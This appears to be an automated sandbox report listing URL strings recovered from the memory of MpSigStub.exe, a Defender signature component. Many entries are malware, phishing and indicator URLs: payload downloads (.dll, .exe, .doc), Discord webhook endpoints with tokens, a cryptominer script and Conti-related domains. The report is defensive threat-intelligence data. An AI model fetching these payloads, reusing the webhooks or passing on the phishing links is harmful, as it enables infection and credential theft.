Source: MpSigStub.exe, 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://cheelersplus.xyz/audio/z2fyes5jywxsywdoyw5achjvdgl2axrplmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://ciginfo.websiteseguro.com/logs/b.doc
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://cl.ly/a93437d0999e/download/reserva%20patricia.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://cld.pt/dl/download/30e57a1d-338a-4c1b-9ad9-db0220f77ef0/bruto.jpg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://clicks.life/care/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://coffreo.biz/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp	String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://crea.N_Dativa.N_De-island.e-m2.net/wp-contena.N_Da.N_Dt/ta.N_Dhemes/creative_a.N_Disland/js/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://creative-island.e-m2.net/wp-content/themes/creative_island/js/vc-composer/RUpDObeysEFp8.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://cryptopro.ga/File/apo.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://dailcarespop.ddnsking.com/audio/cmfuzhkuyxjta25ly2h0qhbyb3rpdml0as5jb20=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://dasinvestment.us/ty/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://deenar.com/sashi/y29ylnn0b2x3awprqg5uaxauy29t
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://defineliving.in/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://demottechamber.org/html
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://des4556yuhgfrt.gb.net/fde45tfttyt/?veg54g5=br4hg4v
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.null.vg/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://dev1.whoatemyI
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://dhl24.com.uk/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp	String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/viewer?url=%s&embedded=true
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://docs.healthmade.org//tc.js
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://donmilps.com/fex/?email=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://dumpitnow2138.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://ecombox.store/tbl_add.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://ecosym.cl/firmas/wp-error.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://elcoyotedesign.com/red1r3ct/base64email/zgfycmvulnboawxsaxbzqhnvdxrozxnzzxguywmudws=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://english.cdfj.org/giremx.org.mx/excx/aw/passf.php?email=arai.kaoru
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: https://erpoweredent.at/3/zte.dll
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://evolvingdesk.nl/GoogleAPI/vendor/symfony/polyfill-intl-normalizer/Resources/JsWPVLZw9qr9GFE.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://exploitbottom.com/dir/?code=
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://faithpays.sowetoinnovations.co.za/khro/php/continue1.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://forbeslegalg%CCFYpowerlist20g%CCFY20.g%CCFYcom/imgg%CCFY/icons/u3BYBjeabtg%CCFYMx.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://geklne.com/extra/?code=cmljagfyzc5tyxjncmf2zubtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://giahanecuador.com/s/?login=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://gidbasket.com/drms/ind.html
